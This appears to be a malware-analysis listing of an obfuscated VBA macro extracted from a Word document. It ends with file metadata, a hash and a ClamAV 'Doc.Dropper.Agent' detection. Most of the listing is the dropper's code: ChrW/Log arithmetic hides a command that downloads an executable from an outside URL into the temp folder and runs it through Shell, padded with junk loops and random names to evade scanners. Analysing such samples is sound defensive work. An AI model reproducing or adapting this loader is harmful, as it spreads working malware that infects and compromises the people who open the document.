ChrW(Log(1.0650406504065) + Log(0.922077922077922) + 45.6881125769836) & ChrW(Log(0.357723577235772) + Log(0.792207792207792) + 78.9309262791345) & ChrW(Log(1.0650406504065) + Log(0.792207792207792) + 100.839918589852) & ChrW(Log(1.78048780487805) + Log(0.909090909090909) + 115.18842280536) & ChrW(Log(1.8780487804878) + Log(0.142857142857143) + 46.9856767939059) & _
ChrW(Log(1.75609756097561) + Log(0.844155844155844) + 86.2763240996463) & ChrW(Log(2.26829268292683) - Log(0.519480519480519) + 99.1960466058113) & ChrW(Log(1.43089430894309) - Log(0.298701298701299) + 96.1033891544097) & _
ChrW(Log(0.317073170731707) + Log(0.155844155844156) + 69.6775214813085) & ChrW(Log(0.333333333333333) + Log(0.584415584415584) + 109.305755220751) & ChrW(Log(0.495934959349593) - Log(0.441558441558442) + 104.553865593962) & ChrW(Log(1.32520325203252) + Log(0.168831168831169) + 102.167290218958) & ChrW(Log(1.21138211382114) - Log(0.181818181818182) + 107.773489957189) & ChrW(Log(1.78048780487805) - Log(0.25974025974026) + 113.745039477256) & _
ChrW(Log(0.967479674796748) - Log(1.01298701298701) + 40.7159642670968) & ChrW(Log(0.869918699186992) + Log(0.532467532467532) + 46.4395888760599) & _
ChrW(Log(0.934959349593496) - Log(0.831168831168831) + 67.5523298885152) & ChrW(Log(2.01626016260163) + Log(0.441558441558442) + 110.786200506445) & ChrW(Log(1.71544715447154) - Log(0.142857142857143) + 116.184416072841) & ChrW(Log(0.682926829268293) + Log(0.714285714285714) + 110.38783979315) & ChrW(Log(0.520325203252033) + Log(0.597402597402597) + 108.838465297377) & ChrW(Log(0.292682926829268) - Log(0.922077922077922) + 111.817539872104) & ChrW(Log(0.853658536585366) - Log(0.155844155844156) + 94.9693252331492) & ChrW(Log(1.55284552845528) - Log(0.194805194805195) + 97.5941557065743) & ChrW(Log(2.10569105691057) + Log(0.480519480519481) + 69.6582438028823) & ChrW(Log(2.28455284552846) - Log(0.545454545454545) + 103.237693882468) & ChrW(Log(1.73170731707317) + Log(0.155844155844156) + 108.979790961729) & ChrW(Log(0.40650406504065) + Log(0.194805194805195) + 103.205916570696) & _
ChrW(Log(0.520325203252033) - Log(0.597402597402597) + 39.8081372466482) & _
"'" & _
"https://mfae.info/newwork/fresh/soft.exe" & _
"','" & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe');" & _
ChrW(Log(1.63414634146341) - Log(0.558441558441558) + 113.596274141153) & ChrW(Log(1.08943089430894) - Log(0.441558441558442) + 114.766899658184) & ChrW(Log(1.79674796747967) - Log(0.792207792207792) + 95.8510900961743) & ChrW(Log(1.47154471544715) - Log(0.324675324675325) + 112.158757727121) & ChrW(Log(0.365853658536585) + Log(0.662337662337662) + 117.087501654731) & " " & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe"
If vPID = 0 Then 'Application not already open
101:
Dim k As String
vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1)
Else 'Application already open so reactivate
On Error GoTo 101
AppActivate (vPID)
End If
Dim yqmoa As Integer
Dim foxbuxscqzdqeai As Double
Dim sfhsabr As Boolean
Dim lay As String
Dim cxpyt As String
Dim dBloNkdlrYkUqxiRSDC As Integer
Dim iuimucvrxeudjj As String
Dim fcpnqp As Boolean
Dim ldzcjaun As Double
Do Until 6859 = 6859
Dim ufrpiaqmjpqxi
ufrpiaqmjpqxi = prfclyya
Loop
Dim cnddjoww(890) As String
cnddjoww(2) = "?Åá䢼ê·Ò«?á¦�"
cnddjoww(7) = "?Äòì?¿"
cnddjoww(3) = "?Äçè?½êÃß??ঢÊ"
cnddjoww(1) = CStr(16)
If bbhoiweumfg = "¬´ôð¢²ò¿Ó¡?Þ�?Òì" Then
Dim yqmoa16
yqmoa16 = 1.34485909332027E+15
End If
Select Case 22
Case Else
End Select
'cnddjowwldzcjaun2?Äçè?½êÃß??ঢÊ
'?Åá䢼ê·Ò«?á¦�?Äòì?¿lay
'fcpnqpsfhsabr0237115
'1616
'sfhsabrldzcjaun0237115
'cxpytlay2
'dBloNkdlrYkUqxiRSDCcxpyt70484385
'fcpnqplay
'yqmoacxpyt#Q14
'laybbhoiweumfg
'70484385cxpyt
'2fcpnqp
'698197416
'0237115ldzcjaun
For aqhxdpdfksosoka = 1 To 2
aqhxdpdfksosoka = aqhxdpdfksosoka + 5
Next
For blipdbui = 1 To 16
blipdbui = blipdbui + 6
Next
For csfc = 1 To 6981974
csfc = csfc + 2
Next
For Each mkmmmojfzpwk In fscljqkiytevybsl
If IsDate(dhcbfitwjvbothqv) And ((6981974 + 2) / (70484385 + 56029298)) <> 8.76685715934267E+16 Then
otyl = "idex" & CStr("spayozpvsiolb")
End If
Next
For vjuhyytdxcmapvo = 1 To 237115
vjuhyytdxcmapvo = vjuhyytdxcmapvo + 8
Next
For ffcsyff = 1 To 1437803
ffcsyff = ffcsyff + 2
Next
For ypjkxmjqiwlmna = 1 To 1437803
ypjkxmjqiwlmna = ypjkxmjqiwlmna + 5
Next
For nnevwpjqalpj = 1 To 70484385
nnevwpjqalpj = nnevwpjqalpj + 3
Next
'qhxdpdfksosokafcsyfffcsyfflipdbuiewkbeomincgzar
'lipdbuiewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'sfclipdbuilipdbuiewkbeomincgzar
'juhyytdxcmapvokmmmojfzpwkpjkxmjqiwlmnaewkbeomincgzar
'fcsyffkmmmojfzpwknevwpjqalpjlipdbui
'pjkxmjqiwlmnaewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'nevwpjqalpjlipdbuicsqyzdhbanlipdbui
'kmmmojfzpwkcsqyzdhbanlipdbui
'ufrpiaqmjpqxijuhyytdxcmapvofcsyffcsqyzdhbanlipdbui
'prfclyyafcsyffewkbeomincgzar
'oweykgcfsadgtkmmmojfzpwkilfdlxbcjuhyytdxcmapvo
'csqyzdhbanlipdbuicsqyzdhbanlipdbui
'ewkbeomincgzarnevwpjqalpjlipdbui
'egjbmyeddqcnhgfcsyffpjkxmjqiwlmnaewkbeomincgzar
'ilfdlxbcjuhyytdxcmapvopjkxmjqiwlmnaewkbeomincgzar
'?Äçè?½êÃß??ঢÊQ14
'?Äòì?¿Q11
Dim arfnumvkrbv As Integer
Dim wnad As Double
Dim wfaiifueicjcvzsj As Boolean
Dim xalrvsnhtz As String
Dim dtm As String
Dim AINDellKHcILVSNTPEh As Integer
Dim aausrzd As String
Dim vsaemqpluckhjhva As Boolean
Dim tlapqnwkjfdwaii As Double
Do Until 2606 = 2606
Dim tetinpwnt
tetinpwnt = zcp
Loop
Dim etjyaiexegmjb(657) As String
etjyaiexegmjb(5) = "?Æèâ?¿ò¹Ú±"
etjyaiexegmjb(5) = "?Äñߤ¿õËɦ?"
etjyaiexegmjb(6) = "«½ñø?·ï"
etjyaiexegmjb(5) = CStr(21)
If ndfyaj = "£²ïð" Then
Dim arfnumvkrbv21
arfnumvkrbv21 = 83348685704351#
End If
Select Case 55
Case Else
End Select
'etjyaiexegmjbtlapqnwkjfdwaii93«½ñø?·ï
'?Æèâ?¿ò¹Ú±?Äñߤ¿õËɦ?xalrvsnhtz
'vsaemqpluckhjhvawfaiifueicjcvzsj594183
'2121
'wfaiifueicjcvzsjtlapqnwkjfdwaii594183
'dtmxalrvsnhtz93
'AINDellKHcILVSNTPEhdtm2
'vsaemqpluckhjhvaxalrvsnhtz
'arfnumvkrbvdtm#Q14
'xalrvsnhtzndfyaj
'2dtm
'93vsaemqpluckhjhva
'619706221
'594183tlapqnwkjfdwaii
For afrnekbcqunohobz = 1 To 93
afrnekbcqunohobz = afrnekbcqunohobz + 3
Next
For biwwnhwibhhtlmyqt = 1 To 21
biwwnhwibhhtlmyqt = biwwnhwibhhtlmyqt + 2
Next
For cbeigksufgzsmuwxn = 1 To 6197062
…

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 75776 bytes |

SHA-256: 67f1fbd148a28ce337d8fabb9085e8d16b32935dc7a7ebad86fa7832ad9cb7a4
Detection
ClamAV: Doc.Dropper.Agent-6837211-0
Obfuscation or payload: likely
418 of 730 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.